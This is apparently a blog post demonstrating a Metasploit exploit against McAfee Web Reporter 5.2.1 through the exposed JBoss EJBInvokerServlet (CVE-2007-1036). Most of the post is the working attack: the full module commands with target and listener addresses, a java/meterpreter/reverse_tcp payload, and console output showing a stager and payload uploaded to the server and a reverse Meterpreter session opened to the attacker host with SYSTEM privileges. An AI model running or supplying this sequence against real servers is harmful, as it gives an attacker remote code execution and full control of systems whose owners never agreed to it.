Metasploit Demo: JBoss DeploymentFileRepository WAR Deployment

Not really a new module but with the correct settings it can be used to exploit the recently disclosed Apache Tomcat/JBoss EJBInvokerServlet/JMXInvokerServlet (RMI over HTTP) Marshalled Object Remote Code Execution vulnerability in McAfee Web Reporter 5.2.1. In this case I had much better luck with the Java payloads.

Description:
This module can be used to execute a payload on JBoss servers that have an exposed HTTPAdaptor’s JMX Invoker exposed on the “JMXInvokerServlet”. By invoking the methods provided by jboss.admin:DeploymentFileRepository a stager is deployed to finally upload the selected payload to the target. The DeploymentFileRepository methods are only available on Jboss 4.x and 5.x.

References:
http://cvedetails.com/cve/2007-1036/
http://secunia.com/community/advisories/55112
http://www.osvdb.org/33744
http://www.redteam-pentesting.de/publications/jboss
http://www.exploit-db.com/exploits/28713/

use exploit/multi/http/jboss_invoke_deploy
set TARGETURI /invoker/EJBInvokerServlet/
set RHOST 192.168.23.172
set RPORT 9111
set payload java/meterpreter/reverse_tcp
set LHOST 192.168.23.174
exploit

[*] Started reverse handler on 192.168.23.174:4444
[*] Attempting to automatically select a target
[*] Attempting to automatically detect the platform
[*] Attempting to automatically detect the architecture
[*] Automatically selected target: “Windows Universal”
[*] Deploying stager
[*] Calling stager: /QAQoJzDmGKHYVJ/BUvtkZBcHzPYhJ.jsp
[*] Uploading payload through stager
[*] Calling payload: /ibFnaehA/ltvkpXyNtZkoUP.jsp
[*] Removing payload through stager
[*] Removing stager
[*] Sending stage (30355 bytes) to 192.168.23.172
[*] Meterpreter session 1 opened (192.168.23.174:4444 -> 192.168.23.172:1098) at 2013-10-13 13:38:23 -0400

meterpreter > getuid
Server username: SYSTEM